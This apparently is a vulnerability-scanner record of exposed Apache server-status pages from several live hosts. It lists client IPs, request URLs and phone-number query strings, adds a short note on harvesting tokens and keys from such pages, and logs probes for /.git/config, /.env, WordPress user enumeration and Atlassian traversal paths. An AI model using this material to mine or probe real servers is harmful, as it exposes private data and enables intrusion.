1-0944540/430/99133_ 86.77127140.014.583314.31 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0944540/414/99182_ 86.4457120.024.323260.74 127.0.0.1http/1.1 1-0944540/417/98922_ 86.750740.05.693206.38 2.18.255.56http/1.1 1-0944540/428/98749_ 86.771321590.011.119424.45 184.31.0.223http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0944540/434/98932_ 86.76139150.017.253208.65 23.54.163.142http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0944540/440/99071_ 86.8010420.021.763257.09 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-0517550/835/102871_ 131.0442170.020.583216.97 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0517550/855/102726_ 130.8529180.032.213162.47 127.0.0.1http/1.1 2-0517550/832/102937_ 130.5777170.028.383393.79 127.0.0.1http/1.1 2-0517550/825/102950_ 131.062910.020.353177.55 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-0517550/812/102770_ 131.025900.023.903349.39 79.104.53.14http/1.1trmm.us:80GET / HTTP/1.1 2-0517550/819/103075_ 131.0443840.024.553310.70 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0517550/821/102792_ 130.96123910.035.343287.32 172.58.122.91http/1.1veew.info:443GET /?2cY&phn=5863397195 HTTP/1.1 2-0517550/858/103204_ 130.96122730.024.213330.72 172.58.122.91http/1.1veew.info:443POST /ajax.php HTTP/1.1 2-0517550/832/102665_ 130.93142160.033.373174.35 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0517550/844/103060_ 130.96122690.025.363188.87 172.58.122.91http/1.1veew.info:443POST /ajax.php HTTP/1.1 2-0517550/829/102751_ 131.0078790.018.393309.79 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0517550/850/102708_ 130.9116200.035.173309.71 59.36.175.46http/1.1thpierpc.com:80GET / HTTP/1.1 2-0517550/830/102524_ 131.10100.020.519564.19 207.154.241.99http/1.1client.simplismarter.com:80GET / HTTP/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c59792b983e3
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Saturday, 02-Jul-2022 17:13:42 UTC Restart Time: Friday, 20-May-2022 14:49:05 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 43 days 2 hours 24 minutes 36 seconds Server load: 0.58 1.14 0.95 Total accesses: 11911422 - Total Traffic: 388.3 GB CPU Usage: u2882.65 s296.37 cu0 cs0 - .0854% CPU load 3.2 requests/sec - 109.3 kB/second - 34.2 kB/request 9 requests currently being processed, 171 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 1111644no17yes513082 222903no2yes117000 3107167no5yes018021 4112229no4yes018011 5121144no8yes117032 667151no6yes117011 918565no4yes018011 1136524no7yes117011 1436768no2yes018011 1542031no2yes018000 Sum10057 917101810 .................._W_______RRW___W________R_____________________ _____________________________________W______________________R_.. ..................................__________________............ ......R_________________....................................____ ________________________________................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0-0/0/54446. 188.421774160.00.001872.59 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0-0/0/54506. 188.371774230.00.001628.05 172.58.189.143http/1.1veew.info:443GET /js/jquery.mobile-1.3.0.min.js HTTP/1.1 0-0-0/0/54365. 188.39177400.00.001762.16 51.222.253.12http/1.1veew.info:443GET /robots.txt HTTP/1.1 0-0-0/0/54403. 188.461774100.00.001798.21 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0-0/0/54474. 188.351774110.00.001693.13 172.58.189.143http/1.1veew.info:443GET /css/jquery.mobile-1.3.0.min.css HTTP/1.1 0-0-0/0/54340. 188.191774560.00.001621.90 51.222.253.12http/1.1 0-0-0/0/54720. 188.3017741370.00.001745.04 127.0.0.1http/1.1 0-0-0/0/54371. 188.421774540.00.001721.29 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax_lylt.php HTTP/1.1 0-0-0/0/54491. 188.431774140.00.001605.33 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0-0/0/54383. 188.431774300.00.001718.61 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-textclub.php HTTP/1.1 0-0-0/0/54484. 188.3817741800.00.001766.88 172.58.189.143http/1.1veew.info:443GET /loader.gif HTTP/1.1 0-0-0/0/54375. 188.421774200.00.001645.23 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0-0/0/54318. 188.38177420.00.001768.49 172.58.189.143http/1.1veew.info:443GET /js/validate-1.2.js HTTP/1.1 0-0-0/0/54533. 188.441774150.00.001721.76 23.56.175.53http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0-0/0/54341. 188.38177440.00.001737.58 172.58.189.143http/1.1veew.info:443GET /js/bootstrap-3.3.7.min.js HTTP/1.1 0-0-0/0/54402. 188.341774740.00.001704.82 172.58.189.143http/1.1veew.info:443GET /?1Fr&phn=2025208103 HTTP/1.1 0-0-0/0/54446. 188.43177416840.00.001695.81 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-textclub.php HTTP/1.1 0-0-0/0/54331. 188.171774240.00.001783.76 172.58.189.143http/1.1 1-01116440/247/55612_ 22.240810.013.151759.69 95.101.88.77http/1.1crm.sprout.online:443GET / HTTP/1.1 1-01116440/244/55312W 22.13000.012.651702.80 95.101.88.100http/1.1trmm.us:443GET /server-status HTTP/1.1 1-01116440/246/55451_ 22.070260.07.411705.27 164.92.240.121http/1.1 1-01116440/222/55463_ 22.24000.07.361786.48 95.101.88.100http/1.1crm.sprout.online:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-01116440/227/55421_ 22.170170.06.747937.64 95.101.88.77http/1.1 1-01116440/250/55489_ 22.24010.01.541725.60 95.101.88.126http/1.1crm.sprout.online:443GET /.git/config HTTP/1.1 1-01116440/233/55534_ 22.25000.010.141685.07 95.101.88.100http/1.1trmm.us:443GET / HTTP/1.1 1-01116440/223/55672_ 22.08020.09.701649.15 95.101.88.45http/1.1 1-01116440/241/55834_ 22.240140.02.761730.20 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-01116440/236/55601R 22.032120.04.101667.82 195.211.77.140http/1.1 1-01116440/238/55672R 22.15000.06.957903.58 95.101.88.77http/1.1 1-01116440/242/55408W 22.19000.04.141690.59 95.101.88.100http/1.1crm.sprout.online:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-01116440/233/55443_ 22.250140.09.391606.62 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-01116440/227/55354_ 22.190100.09.521786.51 95.101.88.45http/1.1 1-01116440/227/55269_ 22.25000.04.181645.65 95.101.88.126http/1.1trmm.us:443GET /.env HTTP/1.1 1-01116440/241/55598W 22.02100.010.291698.34 172.10.230.28http/1.1veew.info:443GET /loader.gif HTTP/1.1 1-01116440/234/55283_ 22.110210.01.641699.31 95.101.88.77http/1.1 1-01116440/231/55345_ 22.24010.08.201679.76 95.101.88.126http/1.1crm.textripple.com:443GET /.DS_Store HTTP/1.1 2-0229030/821/59595_ 109.75231520.036.611946.19 127.0.0.1http/1.1 2-0229030/859/59771_ 109.768160.045.221932.58 95.101.88.77http/1.1 2-0229030/822/59553_ 109.8236160.051.801915.17 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-textclub.php HTTP/1.1 2-0229030/857/60102_ 109.842100.049.341712.93 96.7.74.198http/1.1trmm.us:443GET /public/mms/20220518_184039_UTC_de12aa846d_0.png HTTP/1.1 2-0229030/849/59817_ 109.833213520.044.241872.87 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax_lylt.php HTTP/1.1 2-0229030/818/59818_ 109.8237140.045.341928.60 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-textclub.php HTTP/1.1 2-0229030/839/59997R 109.8142170.045.231876.02 23.56.175.28http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0229030/841/59780_ 109.90010.048.081881.13 95.101.88.100http/1.1trmm.us:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-0229030/811/59780_ 109.876200.062.181860.43 184.31.0.166http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0229030/835/59808_ 109.8237670.049.021853.85 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-textclub.php HTTP/1.1 2-0229030/837/59648_ 109.8142150.054.49
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c5972bec2e9f
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Saturday, 02-Jul-2022 17:13:46 UTC Restart Time: Friday, 20-May-2022 14:49:05 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 43 days 2 hours 24 minutes 40 seconds Server load: 0.58 1.14 0.95 Total accesses: 11911652 - Total Traffic: 388.3 GB CPU Usage: u2884.96 s296.62 cu0 cs0 - .0854% CPU load 3.2 requests/sec - 109.3 kB/second - 34.2 kB/request 21 requests currently being processed, 177 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 019216no13yes108010 1111644no16yes315077 222903no3yes018020 3107167no2yes018011 4112229no3yes018012 5121144no5yes117032 667151no10yes315036 918565no5yes216031 1136524no3yes018011 1436768no2yes018011 1542031no5yes216000 Sum11067 2117702321 ______RRRRRRRRRR__W__________WR_________________________________ ___________________________________________RR_R____R__________.. ..................................__RR______________............ ......__________________....................................____ ___________________RR___________................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0192160/0/54446_ 188.420160.00.001872.59 95.101.88.100http/1.1 0-0192160/1/54507_ 0.17000.00.001628.05 95.101.88.100http/1.1 0-0192160/1/54366_ 0.22000.00.001762.17 95.101.88.126http/1.1trmm.us:443GET /.git/config HTTP/1.1 0-0192160/1/54404_ 0.22000.00.001798.21 95.101.88.100http/1.1trmm.us:443GET /info.php HTTP/1.1 0-0192160/1/54475_ 0.22000.00.001693.13 95.101.88.126http/1.1trmm.us:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-0192160/0/54340_ 188.190560.00.001621.90 95.101.88.126http/1.1 0-0192160/0/54720R 188.3001370.00.001745.04 95.101.88.100http/1.1trmm.us:443 0-0192160/0/54371R 188.420540.00.001721.29 95.101.88.126http/1.1 0-0192160/0/54491R 188.430140.00.001605.33 95.101.88.100http/1.1 0-0192160/0/54383R 188.430300.00.001718.61 164.92.240.121http/1.1client.simplismarter.com:443 0-0192160/0/54484R 188.3801800.00.001766.88 95.101.88.126http/1.1 0-0192160/0/54375R 188.420200.00.001645.23 95.101.88.126http/1.1 0-0192160/0/54318R 188.38020.00.001768.49 95.101.88.100http/1.1 0-0192160/0/54533R 188.440150.00.001721.76 95.101.88.126http/1.1 0-0192160/0/54341R 188.38040.00.001737.58 95.101.88.100http/1.1 0-0192160/0/54402R 188.340740.00.001704.82 95.101.88.100http/1.1 0-0192160/1/54447_ 0.1301310.00.041695.85 95.101.88.100http/1.1 0-0192160/0/54331_ 188.170240.00.001783.76 95.101.88.100http/1.1 1-01116440/249/55614W 22.64000.013.151759.69 137.83.118.175http/1.1trmm.us:443POST /s/ HTTP/1.1 1-01116440/248/55316_ 22.79000.012.701702.85 95.101.88.126http/1.1 1-01116440/248/55453_ 22.77000.07.411705.27 95.101.88.126http/1.1 1-01116440/226/55467_ 22.55000.07.371786.49 95.101.88.100http/1.1 1-01116440/228/55422_ 22.62000.06.747937.64 95.101.88.100http/1.1 1-01116440/253/55492_ 22.54000.01.541725.60 95.101.88.100http/1.1 1-01116440/237/55538_ 22.56000.010.151685.08 95.101.88.100http/1.1 1-01116440/230/55679_ 22.62000.09.701649.16 95.101.88.126http/1.1 1-01116440/243/55836_ 22.83000.02.761730.20 95.101.88.100http/1.1trmm.us:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-01116440/239/55604_ 22.54000.04.121667.85 95.101.88.100http/1.1 1-01116440/242/55676_ 22.81000.06.957903.58 96.7.74.175http/1.1crm.sprout.online:80GET /img HTTP/1.1 1-01116440/249/55415W 22.76000.04.211690.66 95.101.88.126http/1.1trmm.us:443GET /server-status HTTP/1.1 1-01116440/241/55451R 22.76000.09.401606.63 95.101.88.100http/1.1 1-01116440/234/55361_ 22.68000.09.541786.53 95.101.88.100http/1.1 1-01116440/231/55273_ 22.80000.04.181645.65 96.7.74.175http/1.1crm.sprout.online:80GET /pdo HTTP/1.1 1-01116440/246/55603_ 22.73000.013.011701.07 95.101.88.100http/1.1 1-01116440/242/55291_ 22.720280.01.661699.34 95.101.88.126http/1.1 1-01116440/235/55349_ 22.59000.08.211679.76 95.101.88.100http/1.1 2-0229030/822/59596_ 109.93210.036.611946.19 96.7.74.165http/1.1localhost:80GET / HTTP/1.1 2-0229030/859/59771_ 109.761160.045.221932.58 95.101.88.100http/1.1 2-0229030/823/59554_ 110.08000.051.801915.17 95.101.88.100http/1.1trmm.us:443GET /.DS_Store HTTP/1.1 2-0229030/858/60103_ 109.93200.049.341712.93 95.101.88.126http/1.1crm.textripple.com:443GET /lib/.DS_Store HTTP/1.1 2-0229030/850/59818_ 109.93200.044.241872.87 96.7.74.165http/1.1localhost:80GET / HTTP/1.1 2-0229030/819/59819_ 109.92110.045.341928.60 95.101.88.100http/1.1 2-0229030/839/59997_ 109.811170.045.231876.02 95.101.88.100http/1.1 2-0229030/842/59781_ 109.96110.048.081881.13 95.101.88.126http/1.1crm.textripple.com:443GET /pdfs/.DS_Store HTTP/1.1 2-0229030/811/59780_ 109.871200.062.181860.43 95.101.88.100http/1.1 2-0229030/837/59810_ 110.01100.049.021853.86 95.101.88.126http/1.1crm.textripple.com:443GET /.git/config HTTP/1.1 2-0229030/838/59649_ 109.91100.054.491908.23 95.101.88.100http/1.1 2-0229030/862/59892_ 109.91100.030.271826.50 95.101.88.100http/1.1 2-0229030/811/59582_ 109.821190.039.921824.04 95.101.88.100http/1.1 2-0229030/844/60027_ 109.901100.051.681859.50 95.101.88.100http/1.1 2-0229030/845/59851_ 109.94100.051.591780.43 95.101.88.126http/1.1crm.textr
The server-status page (usually /server-status) allows server administrators to find out how well their server is performing.
This is a HTML page that gives the current server statistics such as the server version, up time,cpu, ram, and information about requests made to the server.
This information can be very useful if the application is sent sensitive information as GET requests. If you monitor this page you might be able to find CSRF tokens, API keys, hidden paths, and other sensitive information being sent to the server.
https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb319b9594879b959487e1cfca0c
Apache Status Apache Server Status for nomad.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Sunday, 24-Dec-2023 07:22:13 UTC Restart Time: Tuesday, 12-Dec-2023 17:48:21 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 11 days 13 hours 33 minutes 52 seconds Server load: 0.08 0.02 0.01 Total accesses: 268935 - Total Traffic: 15.3 GB CPU Usage: u597.81 s106.34 cu0 cs0 - .0705% CPU load .269 requests/sec - 16.0 kB/second - 59.6 kB/request 1 requests currently being processed, 179 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 010044no0yes018000 1114846no0yes018000 2127655no1yes018010 39765no1yes018010 4106151no0yes018000 5123272no0yes018000 619783no0yes018000 79491no0yes018000 85337no0yes018000 949846no1yes117010 Sum1003 1179030 ________________________________________________________________ ________________________________________________________________ __________________________________W_________________............ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0100440/428/955_ 140.4711400.07.2832.86 127.0.0.1http/1.1 0-0100440/422/952_ 141.645400.03.804.86 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=2657508562171 HT 0-0100440/420/933_ 141.6114410.05.589.11 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/428/943_ 140.405400.06.847.82 127.0.0.1http/1.1 0-0100440/412/930_ 141.6211210.02.384.09 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/438/964_ 141.5630910.09.7211.53 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/406/913_ 140.3811200.02.863.93 127.0.0.1http/1.1 0-0100440/396/939_ 141.646910.02.453.35 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/392/897_ 140.396910.02.924.89 127.0.0.1http/1.1 0-0100440/423/964_ 141.6212910.05.567.47 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/389/919_ 140.4612910.06.618.13 127.0.0.1http/1.1 0-0100440/396/898_ 140.4133910.07.027.86 127.0.0.1http/1.1 0-0100440/399/919_ 140.4330910.05.176.03 127.0.0.1http/1.1 0-0100440/409/939_ 140.4427710.02.463.48 127.0.0.1http/1.1 0-0100440/436/952_ 141.5633910.02.223.36 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/428/952_ 141.5827710.05.927.56 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-0100440/435/946_ 141.6211400.08.629.89 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=2657448504236 HT 0-0100440/404/925_ 140.4514410.02.014.11 127.0.0.1http/1.1 1-01148460/176/690_ 47.0914110.02.386.81 127.0.0.1http/1.1 1-01148460/186/715_ 47.333600.01.373.62 170.187.138.207http/1.1 1-01148460/193/737_ 47.329810.05.027.80 173.239.218.219http/1.1 1-01148460/180/711_ 47.2126410.03.104.60 127.0.0.1http/1.1 1-01148460/191/717_ 47.193600.03.085.85 170.187.138.207http/1.1 1-01148460/183/710_ 47.3926410.03.316.98 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01148460/180/699_ 47.48500.01.585.15 168.143.243.26http/1.1trmm.us:443GET / HTTP/1.1 1-01148460/181/735_ 46.5525300.00.655.03 66.249.76.40http/1.1 1-01148460/186/720_ 47.326710.01.393.59 51.89.5.185http/1.1 1-01148460/199/690_ 47.4120410.00.632.22 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01148460/176/696_ 46.4125310.03.215.20 66.249.74.106http/1.1 1-01148460/189/709_ 46.7525210.00.685.76 66.249.76.41http/1.1 1-01148460/198/732_ 46.7520410.02.296.35 127.0.0.1http/1.1 1-01148460/180/701_ 47.2425310.02.373.59 66.249.76.42http/1.1 1-01148460/201/720_ 47.4218910.00.484.06 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01148460/186/697_ 47.456700.03.105.70 51.89.5.185http/1.1localhost:443POST / HTTP/1.1 1-01148460/187/714_ 47.2918910.03.086.81 127.0.0.1http/1.1 1-01148460/189/727_ 47.143610.02.515.11 170.187.138.207http/1.1 2-01276550/56/588_ 4.901410.00.054.70 159.65.79.72http/1.1 2-01276550/61/587_ 4.92710.00.123.48 127.0.0.1http/1.1 2-01276550/49/547_ 4.96710.00.042.76 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01276550/57/571_ 4.97200.00.123.82 168.143.243.26http/1.1trmm.us:443GET / HTTP/1.1 2-01276550/57/561_ 4.97600.00.125.89 170.187.152.119http/1.1localhost:443GET /dana-na/nc/nc_gina_ver.txt HTTP/1.1 2-01276550/52/563_ 4.97100.00.068.66 168.143.243.26http/1.1trmm.us:443GET /.vscode/sftp.json HTTP/1.1 2-01276550/57/546_ 4.97000.00.065.76 168.143.243.26http/1.1trmm.us:443GET /debug/default/view?panel=config HTTP/1.1 2-01276550/54/597_ 4.97100.00.062.34 168.143.243.26http/1.1trmm.us:443GET /about HTTP/1.1 2-01276550/53/575_ 4.9211400.00.052.55 127.0.0.1http/1.1localhost:443GET /dynatraceApacheQueuingTimeCheck?timestamp=2657448504457 HT 2-01276550/62/566_ 4.8011410.00.062.28 127.0.0.1http/1.1 2-01276550/53/544_ 4.946710.00.052.20 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-01276550/57/579_ 4.955400.00.083.22 127.0.0.1http/1.1localhost:443GET /dynatraceApacheQueuingTimeCheck?timestamp=2657508562393 HT 2-01276550/52/562_ 4.856700.00.046.38 127.0.0.1http/1.1 2-01276550/56/553_ 4.855410.00.052.36 127.0.0.1http/1.1 2-01276550/60/544_ 4.962210.00.043.87 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb319b9594879b959487766ac30d
Apache Status Apache Server Status for nomad.textripple.com (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Tuesday, 12-Dec-2023 18:05:08 UTC Restart Time: Tuesday, 12-Dec-2023 17:48:21 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 16 minutes 47 seconds Server load: 1.12 0.80 0.33 Total accesses: 563 - Total Traffic: 7.4 MB CPU Usage: u4.81 s.56 cu0 cs0 - .533% CPU load .559 requests/sec - 7.6 kB/second - 13.5 kB/request 2 requests currently being processed, 178 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0105929no0yes018000 1105930no0yes018000 2105935no0yes018000 3105950no1yes018010 4105973no0yes018000 5106002no0yes018000 6106024no0yes018000 7106043no3yes117030 8106065no3yes117020 9107415no0yes018000 Sum1007 2178060 ________________________________________________________________ ________________________________________________________________ ______W_________W___________________________________............ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-01059290/1/1_ 0.0016990.00.000.00 127.0.0.1http/1.1 0-01059290/2/2_ 0.2516600.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1659171652209 HT 0-01059290/1/1_ 0.0516610.00.000.00 127.0.0.1http/1.1 0-01059290/2/2_ 0.279410.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-01059290/1/1_ 0.059400.00.000.00 127.0.0.1http/1.1 0-01059290/1/1_ 0.15300.00.000.00 168.143.243.15http/1.1 0-01059290/2/2_ 0.16100.00.000.00 168.143.243.26http/1.1 0-01059290/2/2_ 0.1745410.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-01059290/2/2_ 0.1934600.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1658991508186 HT 0-01059290/1/1_ 0.0825600.00.000.00 127.0.0.1http/1.1 0-01059290/1/1_ 0.2322600.00.000.00 127.0.0.1http/1.1localhost:80GET /dynatraceApacheQueuingTimeCheck?timestamp=1659111594735 HT 0-01059290/1/1_ 0.0922600.00.000.00 127.0.0.1http/1.1 0-01059290/1/1_ 0.2516910.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01059300/1/1_ 0.05824620.00.020.02 65.211.109.20http/1.1veew.info:443GET /?1XJ&phn=6178693528 HTTP/1.1 1-01059300/1/1_ 0.058232170.00.000.00 65.211.109.20http/1.1veew.info:443POST /ajax.php HTTP/1.1 1-01059300/1/1_ 0.1257900.00.000.00 217.34.133.56http/1.1rewurds.info:80GET /wp-login.php HTTP/1.1 1-01059300/1/1_ 0.1742410.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 1-01059300/1/1_ 0.19367110.00.040.04 99.32.168.66http/1.1veew.info:443GET /js/jquery.min.js HTTP/1.1 1-01059300/1/1_ 0.2613480.00.000.00 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 2-01059350/1/1_ 0.03380.00.000.00 168.143.243.31http/1.1 2-01059350/1/1_ 0.04290.00.000.00 168.143.243.26http/1.1 2-01059350/1/1_ 0.06210.00.000.00 168.143.243.30http/1.1 2-01059350/1/1_ 0.14210.00.000.00 168.143.243.26http/1.1 2-01059350/1/1_ 0.18210.00.000.00 168.143.243.30http/1.1 2-01059350/1/1_ 0.18110.00.000.00 168.143.243.30http/1.1 2-01059350/1/1_ 0.22010.00.000.00 168.143.243.26http/1.1 2-01059350/1/1_ 0.2611810.00.000.00 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 3-01059500/3/3_ 0.34100.00.080.08 168.143.243.26http/1.1trmm.us:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 3-01059500/2/2_ 0.18190.00.000.00 168.143.243.26http/1.1 3-01059500/2/2_ 0.33100.00.010.01 168.143.243.26http/1.1 3-01059500/3/3_ 0.33100.00.010.01 168.143.243.30http/1.1 3-01059500/2/2_ 0.33100.00.070.07 168.143.243.30http/1.1 3-01059500/1/1_ 0.23080.00.010.01 168.143.243.26http/1.1 3-01059500/3/3_ 0.34200.00.010.01 168.143.243.26http/1.1trmm.us:443GET /.git/config HTTP/1.1 3-01059500/2/2_ 0.34200.00.000.00 168.143.243.26http/1.1trmm.us:443GET /s/333323e22343e23353e23323/_/;/META-INF/maven/com.atlassia 3-01059500/3/3_ 0.34200.00.000.00 168.143.243.26http/1.1trmm.us:443GET /s/0383e23343e23353e23323/_/;/META-INF/maven/com.atlassian. 3-01059500/1/1_ 0.34100.00.000.00 168.143.243.26http/1.1trmm.us:443GET /config.json HTTP/1.1 3-01059500/3/3_ 0.34100.00.000.00 168.143.243.26http/1.1trmm.us:443GET /config.json HTTP/1.1 3-01059500/3/3_ 0.34100.00.080.08 168.143.243.26http/1.1trmm.us:443GET /telescope/requests HTTP/1.1 3-01059500/3/3_ 0.34100.00.000.00 168.143.243.26http/1.1trmm.us:443GET /telescope/requests HTTP/1.1 3-01059500/2/2_ 0.32100.00.000.00 168.143.243.30http/1.1 3-01059500/2/2_ 0.34100.00.000.00 168.143.243.26http/1.1trmm.us:443GET /?rest_route=/wp/v2/users/ HTTP/1.1 3-01059500/1/1_ 0.18180.00.000.00 168.143.243.26http/1.1 4-01059730/2/2_ 0.20000.00.010.01 168.143.243.26http/1.1 4-01059730/2/2_ 0.20100.00.010.01 168.143.243.30http/1.1 4-01059730/1/1_ 0.20100.00.000.00 168.143.243.30http/1.1 4-01059730/1/1_ 0.21100.00.000.00 168.143.243.30http/1.1 4-01059730/2/2_ 0.21100.00.000.00 168.143.243.30http/1.1 4-01059730/2/2_ 0.21100.00.000.00 168.143.243.26http/1.1 4-01059730/1/1_ 0.21100.00.000.00 168.143.243.30http/1.1 4-01059730/2/2_ 0.21000.00.000.00 168.143.243.26http/1.1 4-01059730/2/2_ 0.21090.00.070.07 168.143.243.30http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb319b9594879b9594877527cb78
